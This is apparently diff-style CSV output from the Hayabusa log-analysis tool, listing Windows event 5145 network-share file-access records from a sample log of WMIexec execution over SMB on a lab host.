+2021-04-22 20:32:32.050 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W193497eb# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.050 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W193497eb#\2ebfdca668bed840047e6bcbeec44e53 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.064 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W08054466# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.064 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W08054466#\728711ada9b68483d998f34ac723c295 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.064 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wad38fd8b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.064 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wad38fd8b#\9158e541821e2b6d43c32648464e77c2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.079 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wad78daf4# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.079 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wad78daf4#\81b597084cf1f78a1957cf8138744f32 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.096 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.099 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb2d030b7# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.099 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb2d030b7#\fa5c1a0df187c30480b0623065a70395 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.099 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb2d06916# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.099 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb2d06916#\d61b7f885a9fd4f4766031b996ca7d6a | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.099 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb9b5bb58# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.114 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.114 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb9b5bb58#\094367b5bb80758c8f0ab02018658d91 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: USERS\ADMMIG | IP Addr: 10.23.23.9 | LID: 0x18b247,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Contacts\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig | IP Addr: 10.23.23.9 | LID: 0x18b247,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig | IP Addr: 10.23.23.9 | LID: 0x18b247,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wbc80354b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Documents\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wbc80354b#\1dd94a4862b69a4583662583681346ca | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Downloads\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wc1cc6649# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Favorites\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wc1cc6649#\c869d6724028906387ff9f65e11cd9a4 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Links\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wca5f1176# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Music\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wca5f1176#\0e765b6e054c8bac98f30ced03330615 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Pictures\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wcffedcb4# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Saved Games\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wcffedcb4#\37b337245bcc60a0f8c6cc814157fd9f | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Searches\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wd75d181a# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Videos\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wd75d181a#\ff89d7fa29ebae7dfdd1cf2db43686dc | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wd518ee0d# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wd518ee0d#\0658126a7d3bc7b0e7f548f2e3a423fb | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.We9f24001# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.We9f24001#\8505e29c9b52cf09d67343a0fc6f6260 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.We0722664# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.We0722664#\4b78e11f2ba008b681ae84f8d5ffda55 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wed3937f9# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wed3937f9#\11adbe13e64f66d322e04cd718460b97 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wf493a5fb# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wf493a5fb#\8b123051103ee49fa11dd81c04427182 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\MIGUIControls | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\MIGUIControls\26985cb1bb8c065a2e50e5ac0791fbeb | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
